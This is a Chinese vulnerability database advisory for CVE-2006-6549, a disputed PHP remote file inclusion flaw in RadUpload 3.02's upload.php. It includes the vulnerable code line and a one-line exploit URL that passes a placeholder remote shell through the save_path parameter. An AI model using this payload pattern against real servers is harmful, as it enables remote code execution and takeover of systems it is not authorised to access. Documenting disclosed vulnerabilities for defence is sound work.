Rad Upload 'upload.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192480 漏洞类型 未知
发布时间 2006-12-14 更新时间 2006-12-14
CVE编号 CVE-2006-6549 CNNVD-ID CNNVD-200612-324
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-324
|漏洞详情
**争议**RadUpload3.02的upload.php存在PHP远程文件包含漏洞,远程攻击者可借助save_path参数中的URL执行任意PHP代码。注:CVE对此漏洞有争议,因为save_path在使用之前的初始定义为""并且边上的指示说明"编辑以下行来设置保存路径。"
|漏洞EXP
*^* Rad Upload Version 3.02 Remote File Include Vulnerability

*^* Source: http://www.radinks.com/downloads/raduploadlite.zip

*^* Vulnerable C0de On Line 39 In upload.php
    :
	if(isset($save_path) && $save_path!="")

*^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]?

*^* Found3d By: Arham

*^* Gr33tz To -- Str0ke,Usman And Secure-Pak Team
|参考资料

来源:BUGTRAQ
名称:20061212WebApps-RadUploadVersion3.02RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/454175/100/0/threaded
来源:XF
名称:radupload-upload-file-include(30864)
链接:http://xforce.iss.net/xforce/xfdb/30864
来源:SREASON
名称:2034
链接:http://securityreason.com/securityalert/2034